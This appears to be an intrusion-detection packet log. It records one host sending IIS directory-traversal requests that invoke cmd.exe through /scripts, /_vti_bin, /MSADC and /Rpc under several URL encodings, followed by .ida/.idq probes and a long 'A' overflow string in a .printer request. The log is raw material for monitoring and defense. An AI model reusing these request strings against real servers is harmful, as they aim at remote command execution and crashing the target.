TCP TTL:112 TOS:0x0 ID:5265 IpLen:20 DgmLen:130 DF
***AP*** Seq: 0x9A67604D Ack: 0xD719055B Win: 0x4470 TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
63 2E 2E 61 66 2E 2E 25 63 2E 2E 61 66 2E 2E 2F c..af..%c..af../
77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 winnt/system32/c
6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 2F 63 md.exe?/c+dir /c
6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 md.exe?/c+dir HT
54 50 2F 31 2E 30 0D 0A 0D 0A TP/1.0....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:12:12.111545 210.201.100.253:3582 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:6134 IpLen:20 DgmLen:130 DF
***AP*** Seq: 0x9AEFBCEB Ack: 0xD926A750 Win: 0x4470 TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
63 2E 2E 31 63 2E 2E 25 63 2E 2E 31 63 2E 2E 2F c..1c..%c..1c../
77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 winnt/system32/c
6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 2F 63 md.exe?/c+dir /c
6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 md.exe?/c+dir HT
54 50 2F 31 2E 30 0D 0A 0D 0A TP/1.0....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:12:34.303772 210.201.100.253:3706 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:7036 IpLen:20 DgmLen:130 DF
***AP*** Seq: 0x9B946C4C Ack: 0xD9BD82D5 Win: 0x4470 TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
63 2E 2E 39 63 2E 2E 25 63 2E 2E 39 63 2E 2E 2F c..9c..%c..9c../
77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 winnt/system32/c
6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 2F 63 md.exe?/c+dir /c
6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 md.exe?/c+dir HT
54 50 2F 31 2E 30 0D 0A 0D 0A TP/1.0....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:12:56.505946 210.201.100.253:3823 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:7884 IpLen:20 DgmLen:144 DF
***AP*** Seq: 0x9C333A58 Ack: 0xDB86BB94 Win: 0x4470 TcpLen: 20
47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E GET /_vti_bin/..
25 35 63 2E 2E 25 35 63 2E 2E 25 35 63 2E 2E 25 %5c..%5c..%5c..%
35 63 2E 2E 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 5c..%5c../winnt/
73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 system32/cmd.exe
3F 2F 63 2B 64 69 72 20 65 6D 33 32 2F 63 6D 64 ?/c+dir em32/cmd
2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 50 .exe?/c+dir HTTP
2F 31 2E 30 0D 0A 0D 0A /1.0....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:13:18.688119 210.201.100.253:3940 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:8759 IpLen:20 DgmLen:134 DF
***AP*** Seq: 0x9CD32F45 Ack: 0xDC73AF1B Win: 0x4470 TcpLen: 20
47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E GET /_vti_bin/..
25 35 63 2E 2E 25 35 63 2E 2E 25 35 63 2E 2E 25 %5c..%5c..%5c..%
35 63 2E 2E 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 5c..%5c../winnt/
73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 system32/cmd.exe
3F 2F 63 2B 64 69 72 20 78 65 3F 2F 63 2B 64 69 ?/c+dir xe?/c+di
72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:13:41.020410 210.201.100.253:4051 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:9647 IpLen:20 DgmLen:154 DF
***AP*** Seq: 0x9D6A879C Ack: 0xDDC0A1CA Win: 0x4470 TcpLen: 20
47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E GET /_vti_bin/..
25 35 63 2E 2E 25 35 63 2E 2E 25 35 63 2E 2E 25 %5c..%5c..%5c..%
35 63 2E 2E 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 5c..%5c../winnt/
73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 system32/cmd.exe
3F 2F 63 2B 64 69 72 20 77 69 6E 6E 74 2F 73 79 ?/c+dir winnt/sy
73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F stem32/cmd.exe?/
63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0..
0D 0A ..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:14:03.252651 210.201.100.253:4154 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:10842 IpLen:20 DgmLen:134 DF
***AP*** Seq: 0x9E005778 Ack: 0xDFD8D87D Win: 0x4470 TcpLen: 20
47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E GET /_vti_bin/..
25 35 63 2E 2E 25 35 63 2E 2E 25 35 63 2E 2E 25 %5c..%5c..%5c..%
35 63 2E 2E 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 5c..%5c../winnt/
73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 system32/cmd.exe
3F 2F 63 2B 64 69 72 20 78 65 3F 2F 63 2B 64 69 ?/c+dir xe?/c+di
72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:14:25.434835 210.201.100.253:4267 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:11613 IpLen:20 DgmLen:129 DF
***AP*** Seq: 0x9E9CBE77 Ack: 0xE05C95AC Win: 0x4470 TcpLen: 20
47 45 54 20 2F 4D 53 41 44 43 2F 2E 2E 25 35 63 GET /MSADC/..%5c
2E 2E 25 35 63 2E 2E 25 35 63 2E 2E 25 35 63 77 ..%5c..%5c..%5cw
69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D innt/system32/cm
64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 2F 63 6D d.exe?/c+dir /cm
64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 d.exe?/c+dir HTT
50 2F 31 2E 30 0D 0A 0D 0A P/1.0....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:14:47.617031 210.201.100.253:4373 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:12499 IpLen:20 DgmLen:129 DF
***AP*** Seq: 0x9F30CFB7 Ack: 0xE29D0315 Win: 0x4470 TcpLen: 20
47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 35 63 GET /msadc/..%5c
2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E 25 35 63 ../..%5c../..%5c
2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 ../winnt/system3
32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 2/cmd.exe?/c+dir
20 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 .exe?/c+dir HTT
50 2F 31 2E 30 0D 0A 0D 0A P/1.0....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:15:09.829280 210.201.100.253:4503 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:13429 IpLen:20 DgmLen:121 DF
***AP*** Seq: 0x9FDA6BB2 Ack: 0xE3C333A0 Win: 0x4470 TcpLen: 20
47 45 54 20 2F 4D 53 41 44 43 2F 2E 2E 25 35 63 GET /MSADC/..%5c
2E 2E 25 35 63 2E 2E 25 35 63 2E 2E 25 35 63 77 ..%5c..%5c..%5cw
69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D innt/system32/cm
64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 3F 2F 63 d.exe?/c+dir ?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D +dir HTTP/1.0...
0A .
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:15:32.011586 210.201.100.253:4591 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:14240 IpLen:20 DgmLen:123 DF
***AP*** Seq: 0xA062B421 Ack: 0xE600AD52 Win: 0x4470 TcpLen: 20
47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 35 63 GET /msadc/..%5c
2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E 25 35 63 ../..%5c../..%5c
2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 ../winnt/system3
32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 2/cmd.exe?/c+dir
20 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D c+dir HTTP/1.0.
0A 0D 0A ...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:15:54.233802 210.201.100.253:4708 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:14973 IpLen:20 DgmLen:137 DF
***AP*** Seq: 0xA0FECBCA Ack: 0xE6AE24DE Win: 0x4470 TcpLen: 20
47 45 54 20 2F 4D 53 41 44 43 2F 2E 2E 25 35 63 GET /MSADC/..%5c
2E 2E 25 35 63 2E 2E 25 35 63 2E 2E 25 35 63 77 ..%5c..%5c..%5cw
69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D innt/system32/cm
64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 73 79 73 d.exe?/c+dir sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D +dir HTTP/1.0...
0A .
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:16:16.426711 210.201.100.253:4794 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:15836 IpLen:20 DgmLen:135 DF
***AP*** Seq: 0xA185C75A Ack: 0xE804331C Win: 0x4470 TcpLen: 20
47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 35 63 GET /msadc/..%5c
2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E 25 35 63 ../..%5c../..%5c
2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 ../winnt/system3
32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 2/cmd.exe?/c+dir
20 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 32/cmd.exe?/c+d
69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A ir HTTP/1.0....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:16:38.629813 210.201.100.253:4917 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:16747 IpLen:20 DgmLen:121 DF
***AP*** Seq: 0xA2277D55 Ack: 0xEA125D4E Win: 0x4470 TcpLen: 20
47 45 54 20 2F 4D 53 41 44 43 2F 2E 2E 25 35 63 GET /MSADC/..%5c
2E 2E 25 35 63 2E 2E 25 35 63 2E 2E 25 35 63 77 ..%5c..%5c..%5cw
69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D innt/system32/cm
64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 3F 2F 63 d.exe?/c+dir ?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D +dir HTTP/1.0...
0A .
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:17:00.822929 210.201.100.253:1046 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:17544 IpLen:20 DgmLen:123 DF
***AP*** Seq: 0xA2BAF1C0 Ack: 0xEB7E0853 Win: 0x4470 TcpLen: 20
47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 35 63 GET /msadc/..%5c
2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E 25 35 63 ../..%5c../..%5c
2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 ../winnt/system3
32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 2/cmd.exe?/c+dir
20 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D c+dir HTTP/1.0.
0A 0D 0A ...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:17:23.016127 210.201.100.253:1183 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:18518 IpLen:20 DgmLen:118 DF
***AP*** Seq: 0xA3665A26 Ack: 0xEC35EB6E Win: 0x4470 TcpLen: 20
47 45 54 20 2F 52 70 63 2F 2E 2E 25 35 63 2E 2E GET /Rpc/..%5c..
25 35 63 2E 2E 25 35 63 77 69 6E 6E 74 2F 73 79 %5c..%5cwinnt/sy
73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F stem32/cmd.exe?/
63 2B 64 69 72 20 2E 65 78 65 3F 2F 63 2B 64 69 c+dir .exe?/c+di
72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:17:45.219352 210.201.100.253:1263 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:19443 IpLen:20 DgmLen:112 DF
***AP*** Seq: 0xA3E87F08 Ack: 0xEDBCD731 Win: 0x4470 TcpLen: 20
47 45 54 20 2F 52 70 63 2F 2E 2E 25 35 63 2E 2E GET /Rpc/..%5c..
25 35 63 2E 2E 25 35 63 77 69 6E 6E 74 2F 73 79 %5c..%5cwinnt/sy
73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F stem32/cmd.exe?/
63 2B 64 69 72 20 63 2B 64 69 72 20 48 54 54 50 c+dir c+dir HTTP
2F 31 2E 30 0D 0A 0D 0A /1.0....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:18:07.412490 210.201.100.253:1313 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:20347 IpLen:20 DgmLen:124 DF
***AP*** Seq: 0xA456DAC9 Ack: 0xEF7662F9 Win: 0x4470 TcpLen: 20
47 45 54 20 2F 52 70 63 2F 2E 2E 25 35 63 2E 2E GET /Rpc/..%5c..
25 35 63 2E 2E 25 35 63 77 69 6E 6E 74 2F 73 79 %5c..%5cwinnt/sy
73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F stem32/cmd.exe?/
63 2B 64 69 72 20 33 32 2F 63 6D 64 2E 65 78 65 c+dir 32/cmd.exe
3F 2F 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 ?/c+dir HTTP/1.0
0D 0A 0D 0A ....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:18:29.605510 210.201.100.253:1367 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:21054 IpLen:20 DgmLen:112 DF
***AP*** Seq: 0xA4CA83C5 Ack: 0xF0BDF17C Win: 0x4470 TcpLen: 20
47 45 54 20 2F 52 70 63 2F 2E 2E 25 35 63 2E 2E GET /Rpc/..%5c..
25 35 63 2E 2E 25 35 63 77 69 6E 6E 74 2F 73 79 %5c..%5cwinnt/sy
73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F stem32/cmd.exe?/
63 2B 64 69 72 20 63 2B 64 69 72 20 48 54 54 50 c+dir c+dir HTTP
2F 31 2E 30 0D 0A 0D 0A /1.0....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:18:51.808560 210.201.100.253:1439 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:21896 IpLen:20 DgmLen:113 DF
***AP*** Seq: 0xA548F37E Ack: 0xF1A751A4 Win: 0x4470 TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
35 63 2E 2E 25 35 63 77 69 6E 6E 74 2F 73 79 73 5c..%5cwinnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
2B 64 69 72 20 3F 2F 63 2B 64 69 72 20 48 54 54 +dir ?/c+dir HTT
50 2F 31 2E 30 0D 0A 0D 0A P/1.0....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:19:14.011515 210.201.100.253:1493 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:22691 IpLen:20 DgmLen:109 DF
***AP*** Seq: 0xA5BB2944 Ack: 0xF376AB8F Win: 0x4470 TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
35 63 2E 2E 25 35 63 77 69 6E 6E 74 2F 73 79 73 5c..%5cwinnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
2B 64 69 72 20 64 69 72 20 48 54 54 50 2F 31 2E +dir dir HTTP/1.
30 0D 0A 0D 0A 0....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:19:36.204261 210.201.100.253:1569 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:23659 IpLen:20 DgmLen:117 DF
***AP*** Seq: 0xA63D83B0 Ack: 0xF3FB6117 Win: 0x4470 TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
35 63 2E 2E 25 35 63 77 69 6E 6E 74 2F 73 79 73 5c..%5cwinnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
2B 64 69 72 20 2E 65 78 65 3F 2F 63 2B 64 69 72 +dir .exe?/c+dir
20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A HTTP/1.0....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:19:58.426821 210.201.100.253:1616 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:24478 IpLen:20 DgmLen:123 DF
***AP*** Seq: 0xA6AB1AC9 Ack: 0xF59463AC Win: 0x4470 TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
32 66 2E 2E 25 32 66 2E 2E 25 32 66 2E 2E 25 32 2f..%2f..%2f..%2
66 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F fwinnt/system32/
63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 3F cmd.exe?/c+dir ?
2F 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D /c+dir HTTP/1.0.
0A 0D 0A ...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:20:20.619276 210.201.100.253:1678 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:25154 IpLen:20 DgmLen:109 DF
***AP*** Seq: 0xA7252A67 Ack: 0xF74E1207 Win: 0x4470 TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
35 63 2E 2E 25 35 63 77 69 6E 6E 74 2F 73 79 73 5c..%5cwinnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
2B 64 69 72 20 64 69 72 20 48 54 54 50 2F 31 2E +dir dir HTTP/1.
30 0D 0A 0D 0A 0....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:20:42.811681 210.201.100.253:1764 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:25994 IpLen:20 DgmLen:66 DF
***AP*** Seq: 0xA7AB8AAA Ack: 0xF95F8B07 Win: 0x4470 TcpLen: 20
47 45 54 20 2F 6E 75 6C 6C 2E 69 64 61 20 48 54 GET /null.ida HT
54 50 2F 31 2E 30 0D 0A 0D 0A TP/1.0....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:21:05.004139 210.201.100.253:1844 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:26829 IpLen:20 DgmLen:66 DF
***AP*** Seq: 0xA832CD77 Ack: 0xFB1A9ABD Win: 0x4470 TcpLen: 20
47 45 54 20 2F 6E 75 6C 6C 2E 69 64 71 20 48 54 GET /null.idq HT
54 50 2F 31 2E 30 0D 0A 0D 0A TP/1.0....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/05-10:21:27.296448 210.201.100.253:1970 -> 12.82.129.120:80
TCP TTL:112 TOS:0x0 ID:27763 IpLen:20 DgmLen:505 DF
***AP*** Seq: 0xA8D9EC80 Ack: 0xFC41A3CA Win: 0x4470 TcpLen: 20
47 45 54 20 2F 4E 55 4C 4C 2E 70 72 69 6E 74 65 GET /NULL.printe
72 20 48 54 54 50 2F 31 2E 30 0A 48 6F 73 74 3A r HTTP/1.0.Host:
20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
